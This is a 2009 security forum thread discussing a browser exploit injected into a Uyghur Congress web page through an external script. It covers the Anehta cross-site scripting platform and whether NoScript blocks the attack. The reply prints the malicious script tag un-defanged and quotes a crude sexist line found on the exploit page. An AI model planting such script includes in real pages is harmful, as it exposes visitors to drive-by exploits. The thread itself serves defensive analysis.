Page 1 of 1

anehta from axis - does NoScript protect?

Posted: Mon Jul 27, 2009 3:46 pm
by luntrus
Hi forum members,

Look at the following malcode analysis:
exploit
Here are the details I encountered:

1. Virus identified: JS-CVE-2009-1136-A[Expl] (which is an Exploit)
2. Web address: wXw.uyghurcongress.org/En/home.asp
3. Malicious file identified by Avast!: m2m.net84.net/cn/document.js

Mentioned site with this document.js is the malcode residing site:

Code: Select all

[EDITED by me for security reasons and against scanner detection]^^script src="htxtp://m2m.net84.net/cn/document.js"^^/script 

And this is:
Title:
HTTP Error 403 Forbidden
URL: hXtp://m2m.net84.net/cn
Redirects: 301 -> hXtp://m2m.net84.net/cn/
where I find the following:

Code: Select all

 [again EDITED by me]
^a href="anehta-v0.6.0fixed/" anehta-v0.6.0fixed/^/a></li

And this is at the crux of the malcode, because Description (packet storm's):
Anehta is a PHP/Javascript based platform to make cross site scripting and other web attacks easier.
Author: axis
Homepage: hXtp://code.google.com/p/anehta/
File Size: 5596731
Last Modified: Nov 25 17:46:32 2008
MD5 Checksum: 5316c6cb785caef595c58e80a97f4ce8
More info on this new XSS platform: http://archives.neohapsis.com/archives/ ... /0565.html
other redirect is to:
302 -> hXtp://error.000webhost.com/forbidden.html

Is NoScript protecting us against anehta driven exploits?

luntrus

Re: anehta from axis - does NoScript protect?

Posted: Tue Jul 28, 2009 12:39 am
by therube
First, when you visit uyghurcongress (presumably) JavaScript is not allowed, so the exploit is thwarted right there.

Code: Select all

<script src="http://m2m.net84.net/cn/document.js"></script>


Second, even if you do Allow JavaScript on uyghurcongress, the exploit is still hosted on a foreign domain, so again the exploit is thwarted.

Third, the exploit page itself doesn't seem to be returning anything at the moment.
(I wonder if it might only do something if you're visiting from a .cn domain?)

Code: Select all

Secur1ty just lik3 a grl. B0th of th3m h4ve s0me h0les. Y0u alw4ys try to f1nd the h0le, but n0t 3very tim3 y0u c4n 3xpl0it it!